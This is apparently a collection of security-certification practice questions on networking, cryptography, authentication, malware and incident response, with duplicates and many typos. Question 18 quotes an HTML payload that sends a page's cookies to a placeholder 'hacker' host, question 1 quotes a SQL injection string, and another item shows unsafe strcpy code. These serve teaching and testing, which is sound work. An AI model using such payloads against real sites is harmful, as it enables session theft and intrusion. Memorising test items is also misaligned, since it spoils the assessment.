QUESTION 430

A security administrator installed a new network scanner that identifies new host systems on the
network. Which of the following did the security administrator install?
A. Vulnerability scanner
B. Network based IDS
C. Rogue System detection
D. Configuration compliance scanner

QUESTION 434
A recent internal audit is forcing a company to review each internal business unit's VMs because the
clusters they are installed on is in danger of running out of computer resources. Which of the following
vulnerabilities exists?
A. Buffer overflow
B. End of life systems
C. System sprawl
D. Weak configuration

QUESTION 443
Which of the following differentiates a collision attack from a rainbow table attack?
A. A rainbow table attack performs a hash lookup
B. A rainbow table attack uses the hash as a password
C. In a collision attack, the hash and the input data are equivalent
D. In a collision attack, the same input results in different hashes

QUESTION 446
When attackers use a compromised host as a platform for launching attacks deeper into a company's
network, it is said they are:
A. Escalating privilege
B. Becoming persistent
C. Fingerprinting
D. Pivoting
QUESTION 452
A security technician has been receiving alerts from several servers that indicate load balancers have
had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that
the disk space on several servers has reached capacity. The scan also indicates that incoming internet
traffic to the servers has increased. Which of the following is the most likely cause of the decreased disk
space?
A. Misconfigured devices
B. Log and events anomalies
C. Authentication issues
D. unauthorized software

QUESTION 462
Two users must encrypt and transmit large amounts of data between them. Which of the following
should they use to encrypt and transmit the data?
A. Symmetric encryption
B. Hash function
C. Digital Signature
D. Obfuscation
QUESTION 464
A security analyst is investigating a potential breach. Upon gathering, documenting and securing the
evidence, which of the following actions is the next step to minimize the business impact?
A. Launch an investigation to identify the attacking host
B. Initiate the incident response plan
C. Review lessons learned captured in the process
D. Remove malware and restore the system to normal operation

QUESTION 468
The company has a policy that all of the employees must have their badges rekeyed at least annually.
Which of the following describes this policy?
A. Physical
B. Corrective
C. Technical
D. Administrative

QUESTION 470
A forensic export is given a hard drive from a crime scen3e and is asked to perform an investigation.
Which of the following is the first step the forensic expert needs to take to protect the chain of custody?
A. Make a forensic copy
B. Create a hash of the drive
C. Recover the hard drive data
D. Update the evidence log

QUESTION 478
To help prevent one job role from having sufficient access to create, modify and approve payroll data,
which of the following practices should be employed?
A. Least privilege
B. Job rotation
C. Background checks
D. Separation of duties

QUESTION 483
An organization is expanding its network team. Currently, it has local accounts on all network devices,
but with growth, it wants to move to centrally managed authentication. Which of the following are the
best solutions for the organization? (Select two).
A. TACACS+
B. CHAP
C. LDAP
D. RADIUS
E. MSCHAPv2

QUESTION 485
Joe, a salesman, was assigned to a new project that requires him to travel to a client site. Whilst waiting
for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and
then sends confidential emails to fellow colleagues. A few days later, the company experiences a data
breach. Upon investigation the company learns Joe's emails were intercepted. Which of the following
most likely caused the data breach?
A. Policy violation
B. Social engineering
C. Insider threat
D. Zero-day attack

QUESTION 489
A technician is investigating a potentially compromised device with the following symptoms:
Browser slowness
Frequent browser crashes
Hourglass stuck
New Search toolbar
Increased memory consumption
Which of the following types of malware has infected the system?
A. Man in the browser
B. Spoofer
C. Spyware
D. Adware

QUESTION 496
An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a
windows server. Given the following code:
Void foo (char *bar)
(
char random_user_input(12);
strcpy (random_user_input, bar) ;
)
Which of the following vulnerabilities is present?
A. Bad memory pointer
B. Buffer overflow
C. Integer overflow
D. Backdoor
QUESTION 499
A user typically works remotely over the holidays, using a web based VPN to access corporate resources.
The user reports getting untrusted host errors and being unable to connect. Which of the following is
the likely cause?
A. The certificate has expired
B. The browser does not support SSL
C. The user's account is locked out
D. The VPN software has reached the seat license maximum

1. A security administrator has placed the firewall and noticed a number of dropped connections.
After looking at the data the security administrator see the following information that was
flagged as a possible issue:
“SELECT *FROM” and ‘1’=’1’

Which of the following can the security administrator determine from this?

a. An SQL injection attack is being attempted.

b. Legitimate connections are being dropped.
c. A network scan is being done on the system
d. An XSS attack is being attempted.

2. A security auditor is performing a vulnerability scan to find out if mobile applications used in the
organization are secure. The auditor discovered that one application had been accessed
remotely with no legitimate account credentials. After investigating, it seems the application has
allowed some users to bypass authentication of that application. Which of the following types of
malware allow such a compromise to take place? (Select TWO)

a. RAT
b. Ransomware
c. Worm
d. Trojan
e. Backdoor

3. A company wants to provide centralized authentication for its wireless system. The wireless
authentication system must integrate with the directory back end. Which of the following is a
AAA solution that will provide the required wireless authentication?

a. TACACS+
 b. MSCHAPv2
c. RADIUS
d. LDAP

4. After a security assessment was performed on the enterprise network, it was discovered that:
1. Configuration changes have been made by users without the consent of IT.
2. Network congestion has increased due to the use of social media.
3. Users are accessing file folders and network shares that are beyond the scope of their need
to know.

Which of the following BEST describe the vulnerabilities that exist in this environment? (Select TWO)

a. Poorly trained users

b. Misconfigured WAP settings
c. Undocumented assets
d. Improperly configured accounts
e. Vulnerable business processes

5. Joe recently assumes the role of data custodian for his organization. While cleaning out an unused
storage safe, he discovers several hard drives that are labeled “unclassified” and awaiting
destruction. The hard drives are obsolete and cannot be installed in any if his current computing
equipment. Which of the following is the BEST method of disposing of the hard drives?
a. Burning
b. Wiping
c. Purging
d. Pulverizing

6. An organization has an account management policy that defines parameters around each type of
account. The policy specifies different security attributes, such as longevity, usage auditing,
password complexity, and identify proofing. The goal of the account management policy is to
ensure the highest level of security while providing the greatest availability without compromising
data integrity for users. Which of the following account types should the policy specify for service
technicians from corporate partners?

a. Guest account
b. User account
c. Shared account
d. Privileged user account
 e. Default account
f. Service account

7. While investigating a virus infection, a security analyst discovered the following on an employee
laptop;
 Multiple folders containing a large number of newly released movies and music files
 Proprietary company data
 A large amount of PHI data
 Unapproved FTP software
 Documents that appear to belong to a competitor

Which of the following should the analyst do FIRST?

a. Contact the legal and compliance department of guidance

b. Delete the files, remove the FTP software, and notify management
c. Back up the files and return the device to user
d. Wipe and reimage the device

8. Ann, a security analyst wants to implement a secure exchange of email. Which of the following is the
BEST option for Ann to implement?
a. PGP
b. HTTPS
c. WPA
d. TLS

9. An organization electronically processes sensitive data within a controlled facility. The chief
information security officer (CISO) wants to limit emissions from emanating from the facility. Which
of the following mitigates this risk?
a. Upgrading facility cabling to a higher standard of protected cabling to reduce the likelihood of
emission spillage
b. Hardening the facility through the use of secure cabinetry to block emissions
c. Hardening the facility with a Faraday cage to contain emissions produced from data processing
d. Employing security guards to ensure unauthorized personnel remain outside the facility.

10. A remote intruder wants to take inventory of a network so exploits can be researched. The intruder
is looking for information about software versions on the network. Which of the following
techniques is the intruder using?
a. Banner grabbing
 b. Port scanning
c. Packet sniffing

11. Which of the following are used to increase the computing time it takes to brute force a password
suing an offline attack? (Select TWO)
a. XOR
b. PBKDF2
c. Bcrypt
d. HMAC
e. RIPEMD

12. A system administrator has implemented multiple websites using host headers on the same server.
The server hosts two websites that require encryption and other websites where encryption is
optional. Which of the following should the administrator implement to encrypt web traffic for the
required websites?
a. Exteneded domain validation
b. TLS host certificate
c. OCSP stapling
d. Wildcard certificate
13. An analyst is part of a team that is investigating a potential breach of sensitive data at a large
financial services organization. The organization suspects breach occurred when proprietary data
was disclosed to the public. The team finds servers were accessed using sheared credentials that
have been in place for some time. In addition, the team discovers undocumented firewall rules,
which provided unauthorized external access to a server. Suspecting the activities of a malicious
insider threat, which of the following was MOST likely to have been utilized to exfiltrate the
proprietary data?
a. Keylogger
b. Botnet
c. Crypto-malware
d. Backdoor
e. Ransomware
f. DLP

14. When attackers use a compromised host as a platform for launching attacks deeper into a
company’s network, it is said that they are:
a. Escalating privilege
b. Becoming persistent
c. Fingerprinting
 d. Pivoting
15. A security analyst is doing a vulnerability assessment on a database server. A scanning tool returns
the following information:

Database: CustomerAccess1
Column: Password
Data type: MD5 Hash
Salted?: No

There have been several security breaches on the web server that access this database. The security
team is instructed to mitigate the impact of any possible breaches. The security team is also instructed
to improve the security on this database by making it less vulnerable too offline attacks. Which of the
following would BEST accomplish these goals? (Select TWO)

a. Start using salts to generate MD5 password hashes

b. Generate password hashes using SHA-256
c. Force users to change password to the next time they log on
d. Limit users to five attempt logons before they are locked out
e. Require the web server to only use TLS 1.2 encryption.

16. A new security administrator ran a vulnerability scanner for the first time and caused a system
outage. Which of the following types of scans MOST likely caused the outage?
a. Non-intrusive credentialed scan
b. Non-intrusive non-credentialed scan
c. Intrusive credentialed scan
d. Intrusive non-credentialed scan

17. A security analyst is reviewing the password policy for a service account that is used for a critical
network service. The password policy for this is as follows:

Enforce password history: three passwords remembered

Maximum password age: 30 days

Minimum password age: zero days

Complexity requirements: at least one special character, one uppercase

Minimum password length: seven characters

Lockout duration: one day

Lockout threshold: five failed attempts in 15 minutes.

Which of the following adjustments would the MOST appropriate for the service account?
 a. Disable account lockout
b. Set the maximum password age to 15 days
c. Set the minimum password age to seven days
d. Increase password length to 18 characters.

18. An attacker exploited a vulnerability on a email server using the code below

<HTML><body

Onload=document.location.replace (‘http://hacker/post.asp?victim&message =” + document.cookie + “<br>” = “URL:” +”document.location);/>

</body>

</HTML>

Which of the following BEST explains what the attacker is doing?

a. The attacker is replacing cookie

b. The attacker is stealing a document.
c. The attacker is replacing a document
d. The attacker is deleting a cookie

19. A chief information security officer (CISO) asks the security architect to design a method for
contractors to access the company’s internal network securely without allowing access to systems
beyond the scope of their project. Which of the following methods would BEST fit the needs of the
CISO?
a. VPN
b. PaaS
c. IaaS
d. VDI

20. Which of the following is a major difference between XSS attacks and remote code exploits?
a. XSS attacks use machine language, while remote exploits use interpreted language
b. XSS attacks target servers, while remote code exploits target clients
c. Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain
access only

d. Remote code exploits allow writing code at the client side and executing it, while XSS attacks
require no code to work.

21. An incident response analyst at a large corporation is reviewing proxy log data. The analyst believes
a malware infection may have occurred. Upon further review, the analyst determines the computer
 responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO). Which of
the following is the best NEXT step for the analyst to take?
a. Call the CEO directly to ensure awareness of the event
b. Run a malware scan on the CEO’s workstation
c. Reimage the CEO’s workstation
d. Disconnect the CEO’s workstation from the network

22. An organization is expanding its network team. Currently, it has local accounts on all network
devices, but when growth, it wants to move to centrally managed authentication. Which of the
following are the BEST solutions for the organization? (Select TWO)
a. TACACS+
b. CHAP
c. LDAP
d. RADIUS
e. MSCHAPv2

23. A law office has been leasing dark fiber from a local telecommunications company to connect a
remote office to company headquarters. The telecommunication company has decided to
discontinue its dark fiber product and is offering an MPLS connection, which the law office feels is
too expensive. Which of the following is the BEST solution for the law office?
a. Remote access VPN
b. VLAN
c. VPN concentrator
d. Site-to-site VPN

24. As part of a corporate merger, two companies are combining resources. As a result, they must
transfer files through the internet in a secure manner. Which of the following protocols would BEST
meet this objective (Select TWO)
a. LDAPS
b. SFTP
c. HTTPS
d. DNSSEC
e. SRTP

25. Management wishes to add another authentication factor in addition to fingerprints and passwords
in order to have three-factor authentication. Which of the following would BEST satisfy this request?
a. Retinal scan
b. Passphrase
c. Token fob
d. Security question

26. The user typically works remotely over the holidays, using a web-based VPN to access corporate
resources. The user reports getting untrusted host errors and being unable to connect. Which of the
following is MOST likely to cause?
 a. The certificate has expired
b. The browser does not support SSL
c. The user’s account is locked out
d. The VPN software has reached the seat license maximum.

27. An employee in the finance department receives an email, which appears to come from Chief
Financial Officer (CFO), instructing the employee to immediately wire a  large sum of money to a
vendor. Which of the following BEST describes the principles of social engineering used? (Select
TWO)
a. Familiarity
b. Scarcity
c. Urgency
d. Authority
e. Consensus

28. Which of the following encryption algorithms is used primarily to secure data at rest?
a. AES
b. SSL
c. TLS
d. RSA

29. Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of
physical servers, which of the following is the BEST method for Joe to use?
a. Differential
b. Incremental
c. Full
d. Snapshots

30. Company A has acquired company B. Company A has different domains spread globally, and
typically migrates its acquisitions infracture under its own domain infrastructure. Company B,
however, cannot be merged into company A’s domain infrastructure. Which of the following
methods would allow the two companies to access one another’s resources?
a. Attestation
b. Federation
c. Single sign-on
d. Kerberos

31. A consumer purchases an exploits from the dark web. The exploit targets the online shopping cart of
a popular website, allowing the shopper to modify the price of an item at checkout. Which of the
following BEST describes this type of user?
a. Insider
b. Script kiddie
c. Competitor
d. Hacktivist
 e. APT

32. A security analyst is implementing PKI-based functionality to a web application that has the
following requirements:
 File contains certificate information
 Certificate chains
 Root authority certificate
 Private key
All of these components will be part of one file and cryptographically protected with a password. Given
this scenario, which of the following certificate types should the analyst implement to BEST meet these
requirements?
a. .pfx certificate
b. .cer certificate
c. .der certificate
d. .crt certificate

33. A security administrator is reviewing the following firewall configuration after receiving reports that
users are unable to connect to remote websites:

10 PERMIT FROM: ANY TO: ANY PORT: 80

20 PERMIT FROM: ANY TO: ANY PORT: 443
30 DENY FROM: ANY TO: ANY PORT: ANY

Which of the following is the MOST secure solution the security administrator can implement to
fix this issue?

a. Add the following rule the firewall: 5 PERMIT FROM: ANY TO: ANY PORT : 53
b. Replace rule number 10 with the following to rule: 10 PERMIT FROM: ANY TO: ANY PORT :
22
c. Insert following rule in the firewall: 25 PERMIT FROM: ANY TO: ANY PORT : ANY
d. Remove the following rule from the firewall: 30 DENY FROM: ANY TO : ANY PORT: ANY

34. A company is deploying a file-sharing protocol across a network and needs to select a protocol for
authenticating clients. Management require service be configured in the most secure way possible.
The protocol must also be capable of mutual authentication, and support SSO and logons. Which of
the following would BEST accomplish this task?
a. Store credentials in LDAP
b. Use NTLM authentication
c. Implement kerberos
Use MSCHAP authentication

35. A call center company wants to implement a domain policy primarily for its shift workers. The call
center has large groups with different user roles. Management wants to monitor group
performance. Which of the following is BEST solution for the company to implement?
 a. Reduced failed logon attempts
b. Mandatory password changes
c. Increased account lockout time
Time-of-day restrictions

36. A security analyst is hardening a large-scale wireless network. The primary requirements are the
following:
 Must use authentication through EAP-TLS certificates
 Must use AAA server
 Must use the most secure encryption protocol
Given these requirements, which of the following should the analyst implement and recommend?
(Select TWO)
a. 802.1X
b. 802.3
c. LDAP
d. TKIP
e. CCMP
f. WPA2- PSK

37. Which of the following is a compensating control that will BEST reduce the risk of weak passwords?
a. Requiring the use of one-time tokens
b. Increasing password history retention count
c. Disabling user accounts after exceeding maximum attempts
d. Setting expiration of user passwords to a shorter time

38. A company is having issues with intellectual property being sent to a competitor from its system.
The information being sent is not random but has an identifiable pattern. Which of the following
should be implemented in the system to shop the content from being sent?
a. Encrypt
b. Hashing
c. IPS
d. DLP

39. Which of the following allows an auditor to test proprietary-software compiled code for security
flaws?
a. Fuzzing
b. Static review
c. Code signing
d. Regression testing
40. An organization wants to upgrade its enterprise-wide desktop computer solution. The organization
currently has 500 PCs active on the network. The chief Information Security Officer (CISO) suggests
that the organization employ desktop technology for such a large-scale upgrade. Which of the
following is a security benefit of implementing an imaging solution?
a. It allows for faster deployment
b. It provides a consistent baseline
c. It reduces the number of vulnerabilities
d. It decreases the boot time

41. Students at a residence hall are reporting internet connectivity issues. The university’s network
administrator configured the residence hall’s network to provide public IP addresses to all
connected devices, but many student devices are receiving private IP addresses due to rogue
devices. The network administrator verifies the residence hall’s network is correctly configured and
contacts the security administrator for help. Which of the following configurations should the
security administrator suggest for implementation?
a. Router ACLs
b. BPDU guard
c. Flood guard
d. DHCP snooping

42. Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT
devices on their home networks?
a. Power off the devices when they are not in use
b. Prevent IoT devices from contacting the internet directly
c. Apply firmware and software updates upon availability
d. Deploy a bastion host on the network.

43. A security analyst is assessing a small company’s internal servers against recommended security
practices. Which of the following should the analyst do to conduct the assessment? (Select TWO)
a. Compare configurations against platform benchmarks
b. Confirm adherence to the company’s industry-specific regulations
c. Review the company’s current security baseline
d. Verify alignment with policy related to regulatory compliance
e. Run and exploitation framework to confirm vulnerabilities.
44. A computer emergency response team is called at midnight to investigate a case in which a mail
server was restarted. After an initial investigation, it was discovered that email is being exfiltrated
through an active connection. Which of the following is the NEXT step the team should take?
a. Identify the source of the active connection.
b. Perform eradication of the active connection and recover
c. Perform a containment procedure by disconnecting the server
d. Format the server and restore its initial configuration.

45. A penetration testing team deploys a specifically crafted payload to a web server, Which results in
opening a new session as the web server daemon. This session has full read/write access to the file
system and the admin console. Which of the following BEST describes the attack?
a. Domain hijacking
b. Injection
c. Buffer overflow
d. Privilege escalation

46. A security administrator wants to determine if the company’s web servers have the latest operating
system and application patches installed. Which of the following types of vulnerability scans should
be conducted?
a. Non-credentialed
b. Passive
c. Port
d. Credentialed
e. Red team
f. Active

47. An employee workstation with an IP address of 204.211.38.211/24 reports it is unable to submit

print jobs to a network printer at 204.211.38.52/24 after firewall upgrade. The active firewall rules
are as follows:

IP Address Protocol Port Number Action

204.211.38.1/24 ALL ALL Permit

204.211.38.211/24 ALL ALL Permit

204.211.38.52/24 UDP 631 Permit

204.211.38.52/24 TCP 25 Deny

Assuming port numbers have not been changed from their defaults, which of the following should be
modified to allow printing to the network printer?

a. The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP
b. The deny statement for 204.211.38.52/24 should be changed to a permit statement
c. The permit statement for 204.211.38.52/24 should be changed to UDP port 443 instead of 631
d. The permit statement for 204.211.38.52/24 should be changed to TCP port 631 only instead of
ALL.